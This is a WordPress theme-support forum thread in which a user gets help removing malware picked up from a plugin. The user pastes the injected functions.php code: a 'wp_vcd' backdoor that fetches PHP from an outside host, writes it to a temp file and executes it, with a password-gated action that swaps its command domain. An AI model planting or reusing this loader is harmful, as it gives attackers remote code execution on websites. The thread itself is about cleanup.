Virus on my site..

Hi,
Sorry for the asking, I know it is not your job to help me with this, but I hope you can help me.

I have installed a plugin yesterday from internet. And now there is a javascript virus on my site. I know how I can find the virus with code inspector on chrome:
http://imgur.com/a/7cAma
But I don’t know how I can remove it..

Please help.
Thanks!!

Can you Please help?

Hello,

Please, provide your FTP and WordPress admin access so we can check it.

Kind Regards
XTemos Studio

Hello,
Thanks for help, realy thanks.

Hello,

Could you please describe in detail how to find the virus in the console. Please provide a link to the page with the virus.

Kind Regards
XTemos Studio

Ok here it is:

Sorry, but for us, everything is working and when we click on the menu there is no redirect.
See the screencast
https://gyazo.com/65ca87b83908c67ce1ab56a5c4e2d83b

Kind Regards
XTemos Studio

Hi,
Also when you not logged in on WordPress?
Try to use the website in a incognito window, the virus only works when your not logged in as admin..

I know that this: http://imgur.com/a/7cAma is the virus script..

Hey,
I think i fixed it already. But i dont know if it is the right way.
Look, this was the virus:
(see hightlighted) http://imgur.com/a/ZSLat
And now i did this with the link:(I did add wrong info to the link)
http://imgur.com/a/0z0Mk

Do you think it is good? or can I also remove it from functions.php? without doing something wrong?

Yes, you can safely remove this code because it does not apply to our theme.
We are glad to hear that you can find the solution to the problem also we can recommend you to install this plugin to avoid similar problems.

https://wordpress.org/plugins/gotmls/

Kind Regards
XTemos Studio

Hi Thank you very much.
One more thing. Can you tell me what I need to delete exactly? Because im scared that I delete to much. :p

this is the code:
<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ’12ac43c3e4d1377f2d2f98ec7b1f6c07′))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}

}
}
}
break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}

die(“”);
}

if ( ! function_exists( ‘wp_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];

if($tmpcontent = @file_get_contents(“http://www.aotson.com/code499.php?i=&#8221;.$path))
{

function wp_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

And one more thing,
How can I change this color?
http://imgur.com/a/JZm1E

Thanks

1) Yes, you can delete all this code because it does not relate to our theme.

2) You can change the color in Dashboard -> Theme Settings -> Page heading -> Pages heading background
See the screenshot: https://prnt.sc/gb2cd9

Kind Regards
XTemos Studio

Hi,
Thanks for the great support.
Can you please copy+paste the code i can remove? Im scared that i remove to much code..
I dont understand PHP code.

Thanks!

We have removed the code on your site, check how it works now.

Kind Regards
XTemos Studio

Thank you Very much for helping.!
I will give a good rate on themeforest

Have nice day
Yvo

You are welcome!
Contact us if you have any additional questions or concerns.

Kind Regards
XTemos Studio

[Author]

Posts